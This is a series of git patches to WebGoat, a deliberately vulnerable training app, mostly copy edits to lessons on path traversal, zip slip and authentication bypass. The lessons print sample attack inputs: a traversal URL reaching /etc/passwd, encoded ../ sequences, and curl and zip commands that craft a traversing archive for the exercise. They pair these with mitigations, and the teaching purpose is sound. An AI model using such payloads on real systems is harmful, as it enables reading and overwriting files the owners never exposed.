+  java -Duser.home=/home/webgoat -Dfile.encoding=UTF-8 -jar webwolf.jar --server.address=0.0.0.0 > webwolf.log
+}
+
+function write_start_message() {
+  until $(curl --output /dev/null --silent --head --fail http://0.0.0.0:8080/WebGoat/health); do
+    sleep 2
+  done
+  echo "
+    __          __       _        _____                   _
+    \ \        / /      | |      / ____|                 | |
+     \ \  /\  / /  ___  | |__   | |  __    ___     __ _  | |_
+      \ \/  \/ /  / _ \ | '_ \  | | |_ |  / _ \   / _' | | __|
+       \  /\  /  |  __/ | |_) | | |__| | | (_) | | (_| | | |_
+        \/  \/    \___| |_.__/   \_____|  \___/   \__,_|  \__|
+  " >> webgoat.log
+  echo "WebGoat and WebWolf successfully started..." >> webgoat.log
+  pidof nginx >/dev/null && echo "Browse to http://localhost to get started" >> webgoat.log ||  echo "Browse to http://localhost:8080/WebGoat or http://localhost:9090/WebWolf to get started" >> webgoat.log
+}
+
+function tail_log_file() {
+  touch webgoat.log
+  tail -300f webgoat.log
+}
+
+commandline_args=("$@")
+
+nginx
+webgoat &
+webwolf &
+write_start_message &
+tail_log_file
 
-echo "Starting WebWolf..."
-java -Duser.home=/home/webgoat -Dfile.encoding=UTF-8 -jar webwolf.jar --server.address=0.0.0.0 > webwolf.log &
 
-echo "Browse to http://localhost to get started" >> webgoat.log
 
-exec tail -300f webgoat.log

From d047c41e86b85c7a9b687f8a75f52cbcfe5c9005 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 27 Nov 2021 18:05:16 +0100
Subject: [PATCH 108/227] Update README.MD

---
 README.MD | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.MD b/README.MD
index 54fb67444..b3a9c0873 100644
--- a/README.MD
+++ b/README.MD
@@ -67,7 +67,7 @@ WebWolf will be located at: http://localhost:9090/WebWolf (change ports if neces
 
 ### Prerequisites:
 
-* Java 16
+* Java 17
 * Maven > 3.2.1
 * Your favorite IDE
 * Git, or Git support in your IDE

From 939f860dddda748a22c1b7666727d2bf6576e47b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Wed, 8 Dec 2021 19:23:38 +0100
Subject: [PATCH 109/227] renamed spoof-cookie form

---
 .../spoof-cookie/src/main/resources/html/SpoofCookie.html       | 2 +-
 .../resources/templates/{form.html => spoofcookieform.html}     | 0
 2 files changed, 1 insertion(+), 1 deletion(-)
 rename webgoat-lessons/spoof-cookie/src/main/resources/templates/{form.html => spoofcookieform.html} (100%)

diff --git a/webgoat-lessons/spoof-cookie/src/main/resources/html/SpoofCookie.html b/webgoat-lessons/spoof-cookie/src/main/resources/html/SpoofCookie.html
index 7a41f948d..a59ab3cc7 100644
--- a/webgoat-lessons/spoof-cookie/src/main/resources/html/SpoofCookie.html
+++ b/webgoat-lessons/spoof-cookie/src/main/resources/html/SpoofCookie.html
@@ -21,7 +21,7 @@
 		</div>
 
 		<div class="container-fluid">
-			<div th:include="form" id="content"></div>
+			<div th:include="spoofcookieform" id="content"></div>
 		</div>
 
 		<div class="attack-feedback" id="spoof_attack_feedback"></div>
diff --git a/webgoat-lessons/spoof-cookie/src/main/resources/templates/form.html b/webgoat-lessons/spoof-cookie/src/main/resources/templates/spoofcookieform.html
similarity index 100%
rename from webgoat-lessons/spoof-cookie/src/main/resources/templates/form.html
rename to webgoat-lessons/spoof-cookie/src/main/resources/templates/spoofcookieform.html

From d41d21b2e645c73ba3e9b9315dc00ee68368c3b3 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 13 Dec 2021 12:31:35 +0100
Subject: [PATCH 110/227] Update the documentation

---
 .../resources/i18n/WebGoatLabels.properties   |  2 +-
 .../lessonPlans/en/PathTraversal_intro.adoc   | 25 +++++++-------
 .../en/PathTraversal_retrieval.adoc           |  4 +--
 .../lessonPlans/en/PathTraversal_upload.adoc  |  4 +--
 .../en/PathTraversal_upload_fix.adoc          |  4 +--
 .../en/PathTraversal_upload_fixed.adoc        |  4 +--
 .../en/PathTraversal_upload_mitigation.adoc   | 34 +++++++++----------
 ...athTraversal_upload_remove_user_input.adoc |  4 +--
 .../en/PathTraversal_zip_slip.adoc            |  8 ++---
 .../en/PathTraversal_zip_slip_assignment.adoc |  2 +-
 .../en/PathTraversal_zip_slip_solution.adoc   | 24 +++++--------
 11 files changed, 52 insertions(+), 63 deletions(-)

diff --git a/webgoat-lessons/path-traversal/src/main/resources/i18n/WebGoatLabels.properties b/webgoat-lessons/path-traversal/src/main/resources/i18n/WebGoatLabels.properties
index cc5dd57ca..a546f1dcb 100644
--- a/webgoat-lessons/path-traversal/src/main/resources/i18n/WebGoatLabels.properties
+++ b/webgoat-lessons/path-traversal/src/main/resources/i18n/WebGoatLabels.properties
@@ -54,5 +54,5 @@ path-traversal-zip-slip.hint4=Check the http request to find out which image nam
 
 
 path-traversal-zip-slip.no-zip=Please upload a zip file
-path-traversal-zip-slip.extracted=Zip file extracted successfully, failed to copy image. Please contact our helpdesk.
+path-traversal-zip-slip.extracted=Zip file extracted successfully failed to copy the image. Please get in touch with our helpdesk.
 
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_intro.adoc b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_intro.adoc
index 6bf6795ed..81adbe035 100644
--- a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_intro.adoc
+++ b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_intro.adoc
@@ -1,24 +1,23 @@
 === Path traversal
 
-A path(directory) traversal is a vulnerability where an attacker is able to access or store files and directories outside
-the location where the application is running. This may lead to reading files from other directories and in case of a file
-upload overwriting critical system files.
+A path(directory) traversal is a vulnerability where an attacker can access or store files and directories outside
+the application's location. It may lead to reading files from other directories and overwriting critical system files in case of a file
+upload.
 
 === How does it work?
 
-For example let's assume we have an application which hosts some files and they can be requested in the following
-format: `http://example.com/file=report.pdf` now as an attacker you are interested in other files of course so
-you try `http://example.com/file=../../../../../etc/passwd`. In this case you try walk up to the root of the filesystem
-and then go into `/etc/passwd` to gain access to this file. The `../` is called dot-dot-slash which is another name
+For example, let's assume we have an application that hosts some files, in the following
+format: `http://example.com/file=report.pdf` now as an attacker, you are interested in other files, of course, so
+you try `http://example.com/file=../../../../../etc/passwd.` In this case, you try walking up to the root of the filesystem
+and then go into `/etc/passwd` to gain access to this file. The `../` is called dot-dot-slash, another name
 for this attack.
 
-Of course this is a very simple example and in most cases this will not work as frameworks implemented controls for
-this, so we need to get a little more creative and start encoding `../` before the request is sent to the server.
-For example if we URL encode `../` you will get `%2e%2e%2f` and the web server receiving this request will decode
+Of course, this is a straightforward example, and in most cases, this will not work as frameworks implemented controls. So we need to get a little more creative and start encoding `../` before the request is sent to the server.
+For example, if we URL encode `../`, you will get `%2e%2e%2f`, and the webserver receiving this request will decode
 it again to `../`.
 
-Also note that avoiding applications filtering those encodings double encoding might work as well. Double encoding
-might be necessary in the case where you have a system A which calls system B. System A will only decode once and
-will call B with the still encoded URL.
+Also, note that avoiding applications filtering those encodings double encoding might work as well. Double encoding
+might be necessary when you have a system A which calls system B. System A will only decode once and
+call B with the still encoded URL.
 
 
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_retrieval.adoc b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_retrieval.adoc
index 211bf43c9..2f5575019 100644
--- a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_retrieval.adoc
+++ b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_retrieval.adoc
@@ -1,6 +1,6 @@
 === Retrieving other files with a path traversal
 
-Path traversals are not limited to file uploads also when retrieving files it can be the case that a path traversal
-is possible to retrieve other files from the system. In this assignment try to find a file called `path-traversal-secret.jpg`
+Path traversals are not limited to file uploads; when retrieving files, it can be the case that a path traversal
+is possible to retrieve other files from the system. In this assignment, try to find a file called `path-traversal-secret.jpg`
 
 
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload.adoc b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload.adoc
index 071f44a86..422ac170f 100644
--- a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload.adoc
+++ b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload.adoc
@@ -1,7 +1,7 @@
 === Path traversal while uploading files
 
-In this assignment the goal is to overwrite a specific file on the file system. Of course WebGoat cares about the users
-so you need to upload your file to the following location which is outside the normal upload location.
+In this assignment, the goal is to overwrite a specific file on the file system. Of course, WebGoat cares about the users
+so you need to upload your file to the following location outside the usual upload location.
 
 |===
 |OS |Location
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_fix.adoc b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_fix.adoc
index 14146ba1e..f298922fa 100644
--- a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_fix.adoc
+++ b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_fix.adoc
@@ -1,7 +1,7 @@
 === Path traversal while uploading files
 
-The developer became aware of the vulnerability and implemented a fix which removed the `../` from the input.
-Again the same assignment but can you bypass the implemented fix?
+The developer became aware of the vulnerability and implemented a fix that removed the `../` from the input.
+Again the same assignment, but can you bypass the implemented fix?
 
 |===
 |OS |Location
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_fixed.adoc b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_fixed.adoc
index 77eeeafa1..ea8ff9aaf 100644
--- a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_fixed.adoc
+++ b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_fixed.adoc
@@ -1,7 +1,7 @@
 === Path traversal while retrieving files
 
-Finally the upload is no longer vulnerable at least help us to verify :-)
-In this assignment you need to get the contents of the following file:
+Finally, the upload is no longer vulnerable at least help us to verify :-)
+In this assignment, you need to get the contents of the following file:
 
 |===
 |OS |Location
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_mitigation.adoc b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_mitigation.adoc
index 64c59b579..7938594d8 100644
--- a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_mitigation.adoc
+++ b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_mitigation.adoc
@@ -1,12 +1,11 @@
 === Path traversal mitigation
 
-As we saw in the previous assignments protecting a file upload can be a daunting task. The thing comes down to trusting
+As we saw in the previous assignments, protecting a file upload can be daunting. The thing comes down to trust
 input without validating it.
-In the examples shown before a solution might be to not trust user input and create a random file name on the
-server side.
+In the examples shown before, a solution might be not to trust user input and create a random file name on the
+server-side.
 
-If you really need to save it based on user input the best way to keep you save is to check the canonical path the
-file will be saved. For example in Java:
+If you need to save it based on user input, the best way to keep you safe is to check the canonical path. For example, in Java:
 
 [source]
 ----
@@ -21,20 +20,20 @@ if (!canonicalPath.startWith("/tmp") {
 IOUtils.copy(multiPartFile.getBytes(), targetFile);
 ----
 
-The canonical path function will resolve to a absolute path, removing `.` and `..` etc. By checking whether the canonical
-path is inside the expected directory the path traversal will be avoided.
+The canonical path function will resolve to an absolute path, removing `.` and `..` etc. By checking whether the canonical
+the path is inside the expected directory.
 
 
-For path traversals while retrieving one can apply the same technique described above but as a defence in depth you
-can also implement a mitigation by running the application under a specific not privileged user which is not allowed to read and write
+For path traversals, while retrieving, one can apply the same technique described above, but as a defense in depth you
+can also implement mitigation by running the application under a specific not privileged user who is not allowed to read and write
 in any other directory.
 
-Make sure that in any case you build detection for catching these cases but be careful with returning explicit information
-to the user. Every small detail might give the attacker knowledge about your system.
+Make sure that you build detection for catching these cases in any case, but be careful with returning explicit information
+to the user. Every tiny detail might give the attacker knowledge about your system.
 
 ==== Be aware...
 
-As shown in the previous examples be careful which method you use for retrieving parameters especially query parameters.
+As shown in the previous examples, be careful which method you use to retrieve parameters, especially query parameters.
 Spring Boot does a decent job denying invalid path variables. To recap:
 
 [source]
@@ -56,16 +55,15 @@ public void h(HttpServletRequest request) {
 
 If you invoke `/f` with `/f?name=%2E%2E%2F%2E%2E%2Ftest` it will become `../../test`. If you invoke `g` with
 `/g?name=%2E%2E%2F%2E%2E%2Ftest` it will return `%2E%2E%2F%2E%2E%2Ftest` *NO* decoding will be applied.
-The behaviour of `/h` with the same parameter will be the same as `/f`
+The behavior of `/h` with the same parameter will be the same as `/f`
 
-As you can see be careful and familiarize yourself with the correct methods to call. In every case write a
-unit test in such cases which covers encoded characters.
+As you can see, be careful and familiarize yourself with the correct methods to call. In every case, write a
+unit test in such cases, which covers encoded characters.
 
 ==== Spring Boot protection
 
-By default Spring Boot has protection for usage of for example `../` in a path. The implementation can be found in
-`StrictHttpFirewall` class. This will protect endpoint where the user input is part of the `path` like `/test/1.jpg`
-if you replace `1.jpg` with `../../secret.txt` it will block the request. With query parameters that protection
+By default, Spring Boot has protection for using, for example, `../` in a path. The projection resides in the `StrictHttpFirewall` class. This will protect endpoint where the user input is part of the `path` like `/test/1.jpg`
+if you replace `1.jpg` with `../../secret.txt`, it will block the request. With query parameters, that protection
 will not be there.
 
 In the lesson about "File uploads" more examples of vulnerabilities are shown.
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_remove_user_input.adoc b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_remove_user_input.adoc
index aff3f2cbf..248267075 100644
--- a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_remove_user_input.adoc
+++ b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_remove_user_input.adoc
@@ -1,9 +1,9 @@
 === Path traversal while uploading files
 
 The developer again became aware of the vulnerability by not validating the input of the `full name` input field.
-A fix was made in an attempt to solve this vulnerability.
+A fix was applied in an attempt to solve this vulnerability.
 
-Again the same assignment but can you bypass the implemented fix?
+Again the same assignment, but can you bypass the implemented fix?
 
 |===
 |OS |Location
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip.adoc b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip.adoc
index aca05e895..c16fb081f 100644
--- a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip.adoc
+++ b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip.adoc
@@ -1,10 +1,10 @@
 === Zip Slip vulnerability
 
-As a developer, you have many occasions where you have to deal with zip files, for example, think about the upload facility or processing a bunch of CSV files that are uploaded as a zip file. A neat vulnerability was discovered and responsibly disclosed by the Snyk Security team. It uses path traversal which can be used while extracting files. With the path traversal, you try to overwrite files outside the intended target folder. For example, you might be able to overwrite the `ls` command while extracting a zip file. Once this command has been replaced with some extra malicious actions each time the user types in `ls` you can for example send the outcome of the listing towards your server before showing the real command to the user. So you end up with remote command execution.
+As a developer, you have many occasions where you have to deal with zip files. For example, think about the upload facility or processing a bunch of CSV files that are uploaded as a zip file. A neat vulnerability was discovered and responsibly disclosed by the Snyk Security team. It uses path traversal, which can be used while extracting files. With the path traversal, you try to overwrite files outside the intended target folder. For example, you might be able to overwrite the `ls` command while extracting a zip file. Once this command has been replaced with some extra malicious actions each time the user types in `ls`, you can send the outcome of the listing towards your server before showing the actual command to the user. So you end up with remote command execution.
 
 ==== Problem
 
-The problem occurs with how we extract zip files in Java a common way to do this is:
+The problem occurs with how we extract zip files in Java; a common way to do this is:
 
 [source]
 ----
@@ -18,7 +18,7 @@ while (entries.hasMoreElements()) {
 }
 ----
 
-At first glance, this looks ok and you wrote something along the same lines. The problem is, as we have seen in the previous assignments, that you can use a path traversal to break out of the `destinationDir` and start walking towards different locations.
+At first glance, this looks ok, and you wrote something along the same lines. As we have seen in the previous assignments, the problem is that you can use a path traversal to break out of the `destinationDir` and start walking towards different locations.
 
 But what if we receive a zip file with the following contents:
 
@@ -28,4 +28,4 @@ orders.csv
 ../../../../../../../tmp/evil.sh
 ----
 
-if you extract the zip file with the code above the file will be saved in `/tmp/evil.sh`.
\ No newline at end of file
+if you extract the zip file with the code above the file will be saved in `/tmp/evil.sh`.
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip_assignment.adoc b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip_assignment.adoc
index b51b91964..fabbb19db 100644
--- a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip_assignment.adoc
+++ b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip_assignment.adoc
@@ -1,6 +1,6 @@
 === Zip Slip assignment
 
-This time the developers only allow you to upload zip files, however, they made a programming mistake in that uploading the zip file will extract it but it will not replace your image. Can you find a way to overwrite your current image bypassing the programming mistake?
+This time the developers only allow you to upload zip files. However, they made a programming mistake in uploading the zip file will extract it, but it will not replace your image. Can you find a way to overwrite your current image bypassing the programming mistake?
 
 |===
 |OS |Location
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip_solution.adoc b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip_solution.adoc
index bb909b1d8..a9a71af73 100644
--- a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip_solution.adoc
+++ b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip_solution.adoc
@@ -1,6 +1,6 @@
 === Solution
 
-First let's create a zip file with an image inside:
+First, let's create a zip file with an image inside:
 
 [source]
 ----
@@ -8,16 +8,16 @@ curl -o cat.jpg http://localhost:8080/WebGoat/images/cats/1.jpg
 zip profile.zip cat.jpg
 ----
 
-Now let's upload this as our profile image, we can see nothing happens as mentioned in the assignment there is a bug in the software, and the result we see on the screen is:
+Now let's upload this as our profile image. We can see nothing happens as mentioned in the assignment there is a bug in the software, and the result we see on the screen is:
 
 [source]
 ----
-Zip file extracted successfully, failed to copy image. Please contact our helpdesk.
+Zip file extracted successfully failed to copy the image. Please get in touch with our helpdesk.
 ----
 
-Let's create a zip file which traverses all the way to the top and then back into the given directory in the assignment.
+Let's create a zip file that traverses to the top and then back into the given directory in the assignment.
 
-First create the directory structure:
+First, create the directory structure:
 
 [source, subs="macros"]
 ----
@@ -27,11 +27,11 @@ curl -o username:user[] http://localhost:8080/WebGoat/images/cats/1.jpg
 zip profile.zip ../../../../../../../..webGoatTempDir:temppath[]PathTraversal/username:user[]/username:user[].jpg
 ----
 
-Now if we upload this zip file, the assignment will be solved.
+Now, if we upload this zip file, it solves the assignment.
 
 === Why did this work?
 
-In the code the developers used the following fragment:
+In the code, the developers used the following fragment:
 
 [source%linenums]
 ----
@@ -45,12 +45,4 @@ while (entries.hasMoreElements()) {
 }
 ----
 
-The fix is to make sure the resulting file in line 5 resides in the directory you expect. You can use the following method in Java:
-
-[source]
-----
-File profilePicture = new File(uploadDirectory, e.getName());
-if (profilePicture.
-
-----
-
+The fix is to make sure the resulting file in line 5 resides in the directory you expect. Same as with the path traversal mitigation, use `profilePicture.getCanonicalPath()` to ensure the path is the same as you expect it to be.

From 0658fcefcd136ae4b208fbb3cc244919cddf6b26 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 13 Dec 2021 12:38:41 +0100
Subject: [PATCH 111/227] update documentation

---
 .../src/main/resources/lessonPlans/en/2fa-bypass.adoc  | 10 +++++-----
 .../main/resources/lessonPlans/en/bypass-intro.adoc    |  8 ++++----
 .../lessonPlans/en/lesson-template-video.adoc          |  4 ++--
 3 files changed, 11 insertions(+), 11 deletions(-)

diff --git a/webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en/2fa-bypass.adoc b/webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en/2fa-bypass.adoc
index fe4f8fd92..f5e0fc5bd 100644
--- a/webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en/2fa-bypass.adoc
+++ b/webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en/2fa-bypass.adoc
@@ -1,15 +1,15 @@
 
 == 2FA Password Reset
 
-A recent (2016) example (https://henryhoggard.co.uk/blog/Paypal-2FA-Bypass) is a great example of authentication bypass. He was unable to receive an SMS with a code, so he opted for the provided
-alternative method, which involved security questions.  Using a proxy, removed the parameters entirely ... and won.
+An excellent example of authentication bypass is a recent (2016) example (https://henryhoggard.co.uk/blog/Paypal-2FA-Bypass). He could not receive an SMS with a code, so he opted for
+an alternative method, which involved security questions.  Using a proxy, removed the parameters entirely and won.
 
 image::images/paypal-2fa-bypass.png[Paypal 2FA bypass,1397,645,style="lesson-image"]
 
 
 === The Scenario
 
-You are resetting your password, but doing it from a location or device that your provider does not recognize. So you need to answer the security questions you set up.  The other issue is
-that those security questions are also stored on another device (not with you) and you don't remember them.
+You reset your password, but do it from a location or device that your provider does not recognize. So you need to answer the security questions you set up.  The other issue is
+Those security questions are also stored on another device (not with you), and you don't remember them.
 
-You have already provided your username/email and opted for the alternative verification method.
\ No newline at end of file
+You have already provided your username/email and opted for the alternative verification method.
diff --git a/webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en/bypass-intro.adoc b/webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en/bypass-intro.adoc
index ef7c5725a..fd5a8b924 100644
--- a/webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en/bypass-intro.adoc
+++ b/webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en/bypass-intro.adoc
@@ -1,15 +1,15 @@
 == Authentication Bypasses
 
-Authentication Bypasses happen in many ways, but usually take advantage of some flaw in the configuration or logic. Tampering to achieve the right conditions.
+Authentication Bypasses happen in many ways but usually take advantage of some flaw in the configuration or logic. Tampering to achieve the right conditions.
 
 === Hidden inputs
 
-The simplest form is a reliance on a hidden input that is in the web page/DOM.
+The simplest form is a reliance on a hidden input in the web page/DOM.
 
 === Removing Parameters
 
-Sometimes, if an attacker doesn't know the correct value of a parameter, they may remove the parameter from the submission altogether to see what happens.
+Sometimes, if an attacker doesn't know the correct value of a parameter, they may remove it from the submission altogether to see what happens.
 
 === Forced Browsing
 
-If an area of a site is not protected properly by configuration, that area of the site may be accessed by guessing/brute-forcing.
+If an area of a site is not appropriately protected by configuration, that area of the site may be accessed by guessing/brute-forcing.
diff --git a/webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en/lesson-template-video.adoc b/webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en/lesson-template-video.adoc
index 83831886f..105527d5a 100644
--- a/webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en/lesson-template-video.adoc
+++ b/webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en/lesson-template-video.adoc
@@ -1,7 +1,7 @@
 === More Content, Video too ...
 
-You can structure and format the content however you like. You can even include video if you like (but may be subject to browser support). You may want to make it more pertinent to web application security than this though.
+You can structure and format the content however you like. You can even include video if you like (but may be subject to browser support). You may want to make it more pertinent to web application security than this, though.
 
 video::video/sample-video.m4v[width=480,start=5]
 
-see http://asciidoctor.org/docs/asciidoc-syntax-quick-reference/#videos for more detail on video syntax
\ No newline at end of file
+see http://asciidoctor.org/docs/asciidoc-syntax-quick-reference/#videos for more detail on video syntax

From 80e01d680b0f6b740e72b5d2cfa51484d842c624 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 13 Dec 2021 12:47:26 +0100
Subject: [PATCH 112/227] add editor config

---
 .editorconfig | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)
 create mode 100644 .editorconfig

diff --git a/.editorconfig b/.editorconfig
new file mode 100644
index 000000000..8140db745
--- /dev/null
+++ b/.editorconfig
@@ -0,0 +1,16 @@
+root = true
+
+[*]
+charset = utf-8
+end_of_line = lf
+indent_size = 4
+indent_style = space
+insert_final_newline = true
+max_line_length = 120
+tab_width = 4
+ij_continuation_indent_size = 8
+ij_formatter_off_tag = @formatter:off
+ij_formatter_on_tag = @formatter:on
+ij_formatter_tags_enabled = false
+ij_wrap_on_typing = true
+ij_java_names_count_to_use_import_on_demand = 999

From 69a93f30d2fc9a3ae2c8cc5bbf2080e103328513 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 13 Dec 2021 12:58:59 +0100
Subject: [PATCH 113/227] update documentation

---
 .../en/BypassRestrictions_FieldRestrictions.adoc           | 4 ++--
 .../en/BypassRestrictions_FrontendValidation.adoc          | 4 ++--
 .../resources/lessonPlans/en/BypassRestrictions_Intro.adoc | 7 +++----
 3 files changed, 7 insertions(+), 8 deletions(-)

diff --git a/webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en/BypassRestrictions_FieldRestrictions.adoc b/webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en/BypassRestrictions_FieldRestrictions.adoc
index 4d103d6b3..edc411eda 100755
--- a/webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en/BypassRestrictions_FieldRestrictions.adoc
+++ b/webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en/BypassRestrictions_FieldRestrictions.adoc
@@ -1,6 +1,6 @@
 == Field Restrictions
-In most browsers, client has complete or almost complete control over HTML part
+In most browsers, the client has complete or almost complete control over the HTML part
 of the webpage. They can alter values or restrictions to fit their preference.
 
 === Task
-Send a request that bypasses restrictions of all four of these fields
+Send a request that bypasses restrictions of all four of these fields.
diff --git a/webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en/BypassRestrictions_FrontendValidation.adoc b/webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en/BypassRestrictions_FrontendValidation.adoc
index 67b4dd857..cf966a179 100644
--- a/webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en/BypassRestrictions_FrontendValidation.adoc
+++ b/webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en/BypassRestrictions_FrontendValidation.adoc
@@ -1,7 +1,7 @@
 == Validation
 
-Often, there is some mechanism in place to prevent users from sending altered
-field values to server, such as validation before sending. Most of popular browsers
+There is often some mechanism in place to prevent users from sending altered
+field values to the server, such as validation before sending. Most popular browsers
 such as Chrome don't allow editing scripts during runtime. We will have to circumvent
 the validation some other way.
 
diff --git a/webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en/BypassRestrictions_Intro.adoc b/webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en/BypassRestrictions_Intro.adoc
index e75483bc8..201de0cfc 100755
--- a/webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en/BypassRestrictions_Intro.adoc
+++ b/webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en/BypassRestrictions_Intro.adoc
@@ -1,11 +1,10 @@
 == Concept
 
-Users have a great degree of control over the front-end of the web application.
-They can alter HTML code, sometimes also scripts. This is why
-apps that require certain format of input should also validate on server-side.
+Users have a great degree of control over the web application's front-end.
+They can alter HTML code, sometimes also scripts. Applications that require a certain input format should also validate on the server-side.
 
 == Goals
 
 * The user should have a basic knowledge of HTML
-* The user should be able to tamper a request before sending (with proxy or other tool)
+* The user should be able to tamper with a request before sending (with proxy or other tools)
 * The user will be able to tamper with field restrictions and bypass client-side validation

From 5089c107ba5dc10f3fd7ab1aa1936271a2e14662 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 13 Dec 2021 20:20:54 +0100
Subject: [PATCH 114/227] Update documentation

---
 .../en/ChromeDevTools_Assignment.adoc         |  4 ++--
 .../en/ChromeDevTools_Assignment_Network.adoc |  6 ++---
 .../en/ChromeDevTools_console.adoc            | 18 +++++++-------
 .../en/ChromeDevTools_elements.adoc           | 20 ++++++++--------
 .../lessonPlans/en/ChromeDevTools_intro.adoc  | 24 +++++++++----------
 .../en/ChromeDevTools_sources.adoc            | 16 ++++++-------
 6 files changed, 44 insertions(+), 44 deletions(-)

diff --git a/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_Assignment.adoc b/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_Assignment.adoc
index 99981c4ad..a1d8803e1 100644
--- a/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_Assignment.adoc
+++ b/webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en/ChromeDevTools_Assignment.adoc
@@ -1,8 +1,8 @@
 == Try It! Using the console
 
 Let us try it. Use the console in the dev tools and call the javascript function *webgoat.customjs.phoneHome()*. +
-You should get a response in the console. Your result should look something like:
+You should get a response in the console. Your result should look something like this:
 `phone home said
 {"lessonCompleted:true, ... ,"output":"phone home response is..."`
 Paste the random number, after that, in the text field below.
-(Make sure you got the most recent number, since it is randomly generated each time you call the function)
\ No newline at end of file
+(Make sure you got the most recent number since it is randomly generated each time you call the function)
